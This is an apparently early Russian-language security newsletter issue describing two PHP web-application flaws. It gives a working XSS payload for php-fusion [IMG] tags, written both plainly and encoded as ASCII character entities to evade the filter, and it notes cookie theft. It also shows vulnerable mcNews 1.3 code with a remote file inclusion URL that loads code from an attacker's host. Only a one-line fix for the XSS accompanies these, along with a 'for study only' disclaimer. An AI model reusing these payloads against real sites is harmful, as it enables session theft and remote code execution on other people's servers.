Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпуск 01


Информационный Канал Subscribe.Ru

Выпуск ?1
Приветствие подписчикам.

Этот первый выпуск. Рассылка будет посвещяна компьюторной безопасности, языкам программирования и многом другом. Рассылка будет интересна не только специалистам, но и обычным пользователям.
Хочу сразу сказать, что был бы рад видеть новых авторов для рассылки.


Ошибки в PHP.
Информация предназначена только для изучения. Автор рассылки не несет ответственности за использования данной информации.

Ошибка в обработки тегов.

Найдена уязвимость в текущей версии (01.03.05) php-fusion, которая позволяет вам вводить XSS в [IMG] теги.
Для преобразования текста (т.е. javascript:alert('test')) в значениях ASCII кодировки в строках между [img][/img] тегами не проверяется фильтром.
И благодаря этому вы можете посылать команды и они будут выполнены.
Вы можете совершать многие вещи подобно - захвата cookies, переназанчений и множество другого.
Наример:
[IMG]javascript:document.location='http://www.albinoblacksheep.com/flash/you.html'[/IMG]
Должно выглядеть как
[IMG]&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#100&#111&#99&#117&#109&#101&#110&#116&#46&#108&#111&#99&#97&#116&#105&#111&#110&#61&#39&#104&#116&#116&#112&#58&#47&#47&#119&#119&#119&#46&#97&#108&#98&#105&#110&#111&#98&#108&#97&#99&#107&#115&#104&#101&#101&#112&#46&#99&#111&#109&#47&#102&#108&#97&#115&#104&#47&#121&#111&#117&#46&#104&#116&#109&#108&#39[/IMG]

Местоположение:
Отфильтруйте символы '&' и '#'


PHP mcNews 1.3

Уязвимый код в mcNews/admin/header.php:

<?
// mcNews 1.3 Marc Cagninacci marc@phpforums.net
?>

...

<?
if($voir!='') {
$skinfile=strstr($skinfile, 'skin');
include ("$skinfile");
?>

...

--------------------------------------------------------

Пример:

если register_globals=on и allow_url_fopen=on:
http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/


В общем первый выпуск на этом закончен. Пока диайн рассылки будет очень просотй, но со временем все поменятся.
Если вам нравится эта рассылка и вы имеете возможость материально помочь автору, то можете перевести средства на WebMoney R474348938531 или Z451490294903.

http://subscribe.ru/
http://subscribe.ru/feedback/
Подписан адрес:
Код этой рассылки: comp.paper.supuser
Отписаться

В избранное